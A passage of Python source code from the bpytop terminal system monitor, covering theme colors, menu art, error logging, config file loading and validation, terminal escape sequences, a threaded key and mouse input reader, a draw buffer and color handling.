"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
SUBSCRIPT: Tuple[str, ...] = ("₀", "₁", "₂", "₃", "₄", "₅", "₆", "₇", "₈", "₉")
SUPERSCRIPT: Tuple[str, ...] = ("⁰", "¹", "²", "³", "⁴", "⁵", "⁶", "⁷", "⁸", "⁹")
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Issue #364 ----------------------------------------------------------->
def strtobool(val: str) -> bool:
"""Convert a string representation of truth to true (1) or false (0).
True values are 'y', 'yes', 't', 'true', 'on', and '1'; false values
are 'n', 'no', 'f', 'false', 'off', and '0'. Raises ValueError if
'val' is anything else.
"""
try:
val = val.lower()
except AttributeError:
raise ValueError(f"invalid type {type(val)} for truth value {val}")
if val in ('y', 'yes', 't', 'true', 'on', '1'):
return True
elif val in ('n', 'no', 'f', 'false', 'off', '0'):
return False
else:
raise ValueError(f"invalid truth value {val}")
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "use_fstab", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp", "proc_update_mult", "shown_boxes", "net_iface", "only_physical",
"truecolor", "io_mode", "io_graph_combined", "io_graph_speeds", "show_io_stat", "cpu_graph_upper", "cpu_graph_lower", "cpu_invert_lower",
"cpu_single_graph", "show_uptime", "temp_scale", "show_cpu_freq"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
truecolor: bool = True
shown_boxes: str = "cpu mem net proc"
update_ms: int = 2000
proc_update_mult: int = 2
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
cpu_graph_upper: str = "total"
cpu_graph_lower: str = "total"
cpu_invert_lower: bool = True
cpu_single_graph: bool = False
show_uptime: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
temp_scale: str = "celsius"
show_cpu_freq: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
only_physical: bool = True
use_fstab: bool = False
show_io_stat: bool = True
io_mode: bool = False
io_graph_combined: bool = False
io_graph_speeds: str = ""
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
net_iface: str = ""
show_battery: bool = True
show_init: bool = False
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
cpu_percent_fields: List = ["total"]
cpu_percent_fields.extend(getattr(psutil.cpu_times_percent(), "_fields", []))
temp_scales: List[str] = ["celsius", "fahrenheit", "kelvin", "rankine"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version mismatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif SYSTEM == "BSD" and os.path.isfile("/usr/local/etc/bpytop.conf"):
conf_file = "/usr/local/etc/bpytop.conf"
elif SYSTEM != "BSD" and os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
continue
if not '=' in line:
continue
key, line = line.split('=', maxsplit=1)
if not key in self.keys:
continue
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "update_ms" in new_config and int(new_config["update_ms"]) < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
if "shown_boxes" in new_config and not new_config["shown_boxes"] == "":
for box in new_config["shown_boxes"].split(): #type: ignore
if not box in ["cpu", "mem", "net", "proc"]:
new_config["shown_boxes"] = "_error_"
self.warnings.append(f'Config key "shown_boxes" contains invalid box names!')
break
for cpu_graph in ["cpu_graph_upper", "cpu_graph_lower"]:
if cpu_graph in new_config and not new_config[cpu_graph] in self.cpu_percent_fields:
new_config[cpu_graph] = "_error_"
self.warnings.append(f'Config key "{cpu_graph}" does not contain an available cpu stat attribute!')
if "temp_scale" in new_config and not new_config["temp_scale"] in self.temp_scales:
new_config["temp_scale"] = "_error_"
self.warnings.append(f'Config key "temp_scale" does not contain a recognized temperature scale!')
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if ARG_BOXES:
_new_boxes: List = []
for _box in ARG_BOXES.split():
if _box in ["cpu", "mem", "net", "proc"]:
_new_boxes.append(_box)
CONFIG.shown_boxes = " ".join(_new_boxes)
del _box, _new_boxes
if SYSTEM == "Linux" and not os.path.isdir("/sys/class/power_supply"):
CONFIG.show_battery = False
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
old_boxes: List = []
min_width: int = 0
min_height: int = 0
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if Init.running: cls.resized = False; return
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and cls.old_boxes == Box.boxes and not force: return
if force: Collector.collect_interrupt = True
if cls.old_boxes != Box.boxes:
w_p = h_p = 0
cls.min_width = cls.min_height = 0
cls.old_boxes = Box.boxes.copy()
for box_class in Box.__subclasses__():
for box_name in Box.boxes:
if box_name in str(box_class).capitalize():
if not (box_name == "cpu" and "proc" in Box.boxes) and not (box_name == "net" and "mem" in Box.boxes) and w_p + box_class.width_p <= 100:
w_p += box_class.width_p
cls.min_width += getattr(box_class, "min_w", 0)
if not (box_name in ["mem", "net"] and "proc" in Box.boxes) and h_p + box_class.height_p <= 100:
h_p += box_class.height_p
cls.min_height += getattr(box_class, "min_h", 0)
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < cls.min_width or cls._h < cls.min_height):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < cls.min_width or cls._h < cls.min_height:
Draw.now(Term.clear)
box_width = min(50, cls._w - 2)
Draw.now(f'{create_box(cls._w // 2 - box_width // 2, cls._h // 2 - 2, box_width, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(box_width // 4)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < cls.min_width else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < cls.min_height else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.d(1)}{Mv.l(25)}{Colors.default}{Colors.black_bg}Current config need: {cls.min_width} x {cls.min_height}{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
while Key.has_key():
if Key.last() == "q": clean_quit()
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
Collector.proc_counter = 1
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns string ."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor position
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go through dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
if not all(0 <= c <= 255 for c in self.dec):
raise ValueError(f'One or more RGB values are out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
if not CONFIG.truecolor or LOW_COLOR:
self.escape = f'{self.truecolor_to_256(rgb=self.dec, depth=self.depth)}'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def truecolor_to_256(rgb: Tuple[int, int, int], depth: str="fg") -> str:
out: str = ""
pre: str = f'\033[{"38" if depth == "fg" else "48"};5;'
greyscale: Tuple[int, int, int] = ( rgb[0] // 11, rgb[1] // 11, rgb[2] // 11 )
if greyscale[0] == greyscale[1] == greyscale[2]:
out = f'{pre}{232 + greyscale[0]}m'
else:
out = f'{pre}{round(rgb[0] / 51) * 36 + round(rgb[1] / 51) * 6 + round(rgb[2] / 51) + 16}m'
return out
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{c};{c};{c}m'
else:
color = f'{Color.truecolor_to_256(rgb=(c, c, c), depth=depth)}'
elif len(hexa) == 7:
if CONFIG.truecolor and not LOW_COLOR:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
else:
